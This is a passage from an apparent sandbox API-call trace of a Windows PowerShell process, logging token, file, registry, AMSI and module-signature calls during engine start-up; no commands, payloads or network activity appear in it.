ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0141.187] GetCurrentProcess () returned 0xffffffffffffffff [0141.187] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c8d8 | out: TokenHandle=0xb156f8c8d8*=0x714) returned 1 [0141.188] GetCurrentProcess () returned 0xffffffffffffffff [0141.189] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c8d8 | out: TokenHandle=0xb156f8c8d8*=0x718) returned 1 [0141.211] GetCurrentProcess () returned 0xffffffffffffffff [0141.211] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c638 | out: TokenHandle=0xb156f8c638*=0x71c) returned 1 [0141.250] GetCurrentProcess () returned 0xffffffffffffffff [0141.250] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8c648 | out: TokenHandle=0xb156f8c648*=0x720) returned 1 [0141.369] ReadFile (in: hFile=0x638, lpBuffer=0x1e33952ed10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8db88, lpOverlapped=0x0 | out: lpBuffer=0x1e33952ed10*, lpNumberOfBytesRead=0xb156f8db88*=0x1000, lpOverlapped=0x0) returned 1 [0141.393] EtwEventRegister () returned 0x0 [0141.428] GetCurrentProcess () returned 0xffffffffffffffff [0141.428] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d4e8 | out: TokenHandle=0xb156f8d4e8*=0x728) returned 1 [0141.432] GetCurrentProcess () returned 0xffffffffffffffff [0141.432] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d4f8 | out: TokenHandle=0xb156f8d4f8*=0x72c) returned 1 [0142.468] ReadFile (in: hFile=0x638, lpBuffer=0x1e33957049b, nNumberOfBytesToRead=0x28, lpNumberOfBytesRead=0xb156f8d828, lpOverlapped=0x0 | out: lpBuffer=0x1e33957049b*, lpNumberOfBytesRead=0xb156f8d828*=0x28, lpOverlapped=0x0) returned 1 [0142.468] ReadFile (in: hFile=0x638, lpBuffer=0x1e33952ed10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d7f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33952ed10*, lpNumberOfBytesRead=0xb156f8d7f8*=0x1000, lpOverlapped=0x0) returned 1 [0142.471] ReadFile (in: hFile=0x638, lpBuffer=0x1e3395704c7, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0xb156f8d828, lpOverlapped=0x0 | out: lpBuffer=0x1e3395704c7*, lpNumberOfBytesRead=0xb156f8d828*=0x14, lpOverlapped=0x0) returned 1 [0142.472] ReadFile (in: hFile=0x638, lpBuffer=0x1e33952ed10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d7f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33952ed10*, lpNumberOfBytesRead=0xb156f8d7f8*=0x1000, lpOverlapped=0x0) returned 1 [0142.472] ReadFile (in: hFile=0x638, lpBuffer=0x1e33957048a, nNumberOfBytesToRead=0x2f, lpNumberOfBytesRead=0xb156f8d828, lpOverlapped=0x0 | out: lpBuffer=0x1e33957048a*, lpNumberOfBytesRead=0xb156f8d828*=0x2f, lpOverlapped=0x0) returned 1 [0142.472] ReadFile (in: hFile=0x638, lpBuffer=0x1e33952ed10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d7f8, lpOverlapped=0x0 | out: lpBuffer=0x1e33952ed10*, lpNumberOfBytesRead=0xb156f8d7f8*=0x1000, lpOverlapped=0x0) returned 1 [0142.472] ReadFile (in: hFile=0x638, lpBuffer=0x1e339570450, nNumberOfBytesToRead=0x17, lpNumberOfBytesRead=0xb156f8d7b8, lpOverlapped=0x0 | out: lpBuffer=0x1e339570450*, lpNumberOfBytesRead=0xb156f8d7b8*=0x17, lpOverlapped=0x0) returned 1 [0142.472] ReadFile (in: hFile=0x638, lpBuffer=0x1e33952ed10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d858, lpOverlapped=0x0 | out: lpBuffer=0x1e33952ed10*, lpNumberOfBytesRead=0xb156f8d858*=0xd58, lpOverlapped=0x0) returned 1 [0142.484] ReadFile (in: hFile=0x638, lpBuffer=0x1e33952ed10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8db58, lpOverlapped=0x0 | out: lpBuffer=0x1e33952ed10*, lpNumberOfBytesRead=0xb156f8db58*=0x0, lpOverlapped=0x0) returned 1 [0142.485] CloseHandle (hObject=0x638) returned 1 [0142.487] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8db20, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0142.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dfb0) returned 1 [0142.489] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1e3395961f0 | out: lpFileInformation=0x1e3395961f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0142.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8df70) returned 1 [0142.490] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0xb156f8da50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0142.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dea0) returned 1 [0142.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0xb156f8df80 | out: lpFileInformation=0xb156f8df80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6aa912f0, ftLastAccessTime.dwHighDateTime=0x1d709ec, ftLastWriteTime.dwLowDateTime=0x6aa912f0, ftLastWriteTime.dwHighDateTime=0x1d709ec, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0142.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8de60) returned 1 [0142.490] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0xb156f8d900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0142.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dde0) returned 1 [0142.490] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x638 [0142.491] GetFileType (hFile=0x638) returned 0x1 [0142.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd50) returned 1 [0142.491] GetFileType (hFile=0x638) returned 0x1 [0142.519] ReadFile (in: hFile=0x638, lpBuffer=0x1e33959a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc48, lpOverlapped=0x0 | out: lpBuffer=0x1e33959a438*, lpNumberOfBytesRead=0xb156f8dc48*=0x1000, lpOverlapped=0x0) returned 1 [0143.595] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c498 | out: phkResult=0xb156f8c498*=0x0) returned 0x2 [0143.596] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c498 | out: phkResult=0xb156f8c498*=0x0) returned 0x2 [0143.707] ReadFile (in: hFile=0x638, lpBuffer=0x1e33959a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d918, lpOverlapped=0x0 | out: lpBuffer=0x1e33959a438*, lpNumberOfBytesRead=0xb156f8d918*=0x1000, lpOverlapped=0x0) returned 1 [0143.711] ReadFile (in: hFile=0x638, lpBuffer=0x1e3395cda2d, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0xb156f8d5a8, lpOverlapped=0x0 | out: lpBuffer=0x1e3395cda2d*, lpNumberOfBytesRead=0xb156f8d5a8*=0x5, lpOverlapped=0x0) returned 1 [0143.711] ReadFile (in: hFile=0x638, lpBuffer=0x1e33959a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d578, lpOverlapped=0x0 | out: lpBuffer=0x1e33959a438*, lpNumberOfBytesRead=0xb156f8d578*=0xb02, lpOverlapped=0x0) returned 1 [0143.730] ReadFile (in: hFile=0x638, lpBuffer=0x1e33959a438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8dc18, lpOverlapped=0x0 | out: lpBuffer=0x1e33959a438*, lpNumberOfBytesRead=0xb156f8dc18*=0x0, lpOverlapped=0x0) returned 1 [0143.730] CloseHandle (hObject=0x638) returned 1 [0143.733] ReleaseMutex (hMutex=0x6fc) returned 1 [0143.739] CoCreateGuid (in: pguid=0xb156f8e078 | out: pguid=0xb156f8e078*(Data1=0x738be67f, Data2=0x8ea1, Data3=0x4338, Data4=([0]=0xae, [1]=0xd4, [2]=0xb9, [3]=0xa4, [4]=0x1c, [5]=0xfa, [6]=0x87, [7]=0x15))) returned 0x0 [0143.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x638 [0143.757] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x730 [0143.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x734 [0143.757] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x738 [0143.757] SetEvent (hEvent=0x738) returned 1 [0143.758] SetEvent (hEvent=0x638) returned 1 [0143.758] SetEvent (hEvent=0x730) returned 1 [0143.758] SetEvent (hEvent=0x734) returned 1 [0143.759] AmsiCloseSession () returned 0x7ffbe18d8068 [0143.759] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x73c [0143.760] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.877] EtwEventActivityIdControl () returned 0x0 [0143.877] EtwEventActivityIdControl () returned 0x0 [0143.877] EtwEventActivityIdControl () returned 0x0 [0145.004] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0145.061] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8d320, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d770) returned 1 [0145.062] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d850 | out: lpFileInformation=0xb156f8d850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0145.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d730) returned 1 [0145.063] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0145.067] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8ce80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.067] CoTaskMemAlloc (cb=0x20c) returned 0x1e35140f850 [0145.067] GetSystemDirectoryW (in: lpBuffer=0x1e35140f850, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0145.067] CoTaskMemFree (pv=0x1e35140f850) [0145.067] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8cd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0145.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d1a0) returned 1 [0145.068] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d280 | out: lpFileInformation=0xb156f8d280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0145.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d160) returned 1 [0145.068] WldpGetLockdownPolicy () returned 0x0 [0145.068] GetSystemInfo (in: lpSystemInfo=0xb156f8d2e0 | out: lpSystemInfo=0xb156f8d2e0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0145.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d1e8 | out: phkResult=0xb156f8d1e8*=0x718) returned 0x0 [0145.070] RegQueryValueExW (in: hKey=0x718, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8d238, lpData=0x0, lpcbData=0xb156f8d230*=0x0 | out: lpType=0xb156f8d238*=0x0, lpData=0x0, lpcbData=0xb156f8d230*=0x0) returned 0x2 [0145.070] RegCloseKey (hKey=0x718) returned 0x0 [0145.085] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d0b0) returned 1 [0145.085] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x718 [0145.085] GetFileType (hFile=0x718) returned 0x1 [0145.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d020) returned 1 [0145.085] GetFileType (hFile=0x718) returned 0x1 [0145.086] SetFilePointer (in: hFile=0x718, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8d068*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8d068*=0) returned 0x0 [0145.086] ReadFile (in: hFile=0x718, lpBuffer=0x1e3392da600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d0e8, lpOverlapped=0x0 | out: lpBuffer=0x1e3392da600*, lpNumberOfBytesRead=0xb156f8d0e8*=0x950, lpOverlapped=0x0) returned 1 [0145.088] SetFilePointer (in: hFile=0x718, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8d068*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8d068*=0) returned 0x950 [0145.088] ReadFile (in: hFile=0x718, lpBuffer=0x1e3392d9ab8, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0xb156f8d0e8, lpOverlapped=0x0 | out: lpBuffer=0x1e3392d9ab8*, lpNumberOfBytesRead=0xb156f8d0e8*=0x0, lpOverlapped=0x0) returned 1 [0145.088] SetFilePointer (in: hFile=0x718, lDistanceToMove=0, lpDistanceToMoveHigh=0xb156f8d068*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xb156f8d068*=0) returned 0x950 [0145.088] ReadFile (in: hFile=0x718, lpBuffer=0x1e3392da600, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xb156f8d0e8, lpOverlapped=0x0 | out: lpBuffer=0x1e3392da600*, lpNumberOfBytesRead=0xb156f8d0e8*=0x0, lpOverlapped=0x0) returned 1 [0145.088] CoTaskMemAlloc (cb=0x20c) returned 0x1e35140e970 [0145.089] GetSystemDirectoryW (in: lpBuffer=0x1e35140e970, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0145.089] CoTaskMemFree (pv=0x1e35140e970) [0145.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0145.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d000) returned 1 [0145.089] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d0e0 | out: lpFileInformation=0xb156f8d0e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0145.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8cfc0) returned 1 [0145.089] WldpGetLockdownPolicy () returned 0x0 [0145.089] GetSystemInfo (in: lpSystemInfo=0xb156f8d140 | out: lpSystemInfo=0xb156f8d140*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0145.090] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8d048 | out: phkResult=0xb156f8d048*=0x71c) returned 0x0 [0145.090] RegQueryValueExW (in: hKey=0x71c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8d098, lpData=0x0, lpcbData=0xb156f8d090*=0x0 | out: lpType=0xb156f8d098*=0x0, lpData=0x0, lpcbData=0xb156f8d090*=0x0) returned 0x2 [0145.090] RegCloseKey (hKey=0x71c) returned 0x0 [0145.090] CloseHandle (hObject=0x718) returned 1 [0145.095] CoCreateGuid (in: pguid=0xb156f8d1f8 | out: pguid=0xb156f8d1f8*(Data1=0x2b6d9c3a, Data2=0x983e, Data3=0x4867, Data4=([0]=0x88, [1]=0xc9, [2]=0x1d, [3]=0x62, [4]=0x7a, [5]=0xb8, [6]=0x3e, [7]=0xcb))) returned 0x0 [0145.122] AmsiOpenSession () returned 0x0 [0145.122] AmsiScanString () returned 0x80070015 [0145.159] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c770, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8cbc0) returned 1 [0145.159] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cca0 | out: lpFileInformation=0xb156f8cca0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0145.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8cb80) returned 1 [0145.159] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c720, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.160] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c650, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8caa0) returned 1 [0145.160] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0xb156f8cb80 | out: lpFileInformation=0xb156f8cb80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0145.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8ca60) returned 1 [0145.160] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c550, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0145.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8ca30) returned 1 [0145.160] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x704 [0145.160] GetFileType (hFile=0x704) returned 0x1 [0145.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c9a0) returned 1 [0145.160] GetFileType (hFile=0x704) returned 0x1 [0145.160] WTGetSignatureInfo () returned 0x0 [0145.202] CertDuplicateCertificateContext (pCertContext=0x1e3513ece20) returned 0x1e3513ece20 [0145.202] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8cac8 | out: phkResult=0xb156f8cac8*=0x6fc) returned 0x0 [0145.202] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cb18, lpData=0x0, lpcbData=0xb156f8cb10*=0x0 | out: lpType=0xb156f8cb18*=0x1, lpData=0x0, lpcbData=0xb156f8cb10*=0x56) returned 0x0 [0145.202] RegQueryValueExW (in: hKey=0x6fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xb156f8cb18, lpData=0x1e339307790, lpcbData=0xb156f8cb10*=0x56 | out: lpType=0xb156f8cb18*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xb156f8cb10*=0x56) returned 0x0 [0145.203] RegCloseKey (hKey=0x6fc) returned 0x0 [0145.203] CoTaskMemAlloc (cb=0x10) returned 0x1e351345220 [0145.203] 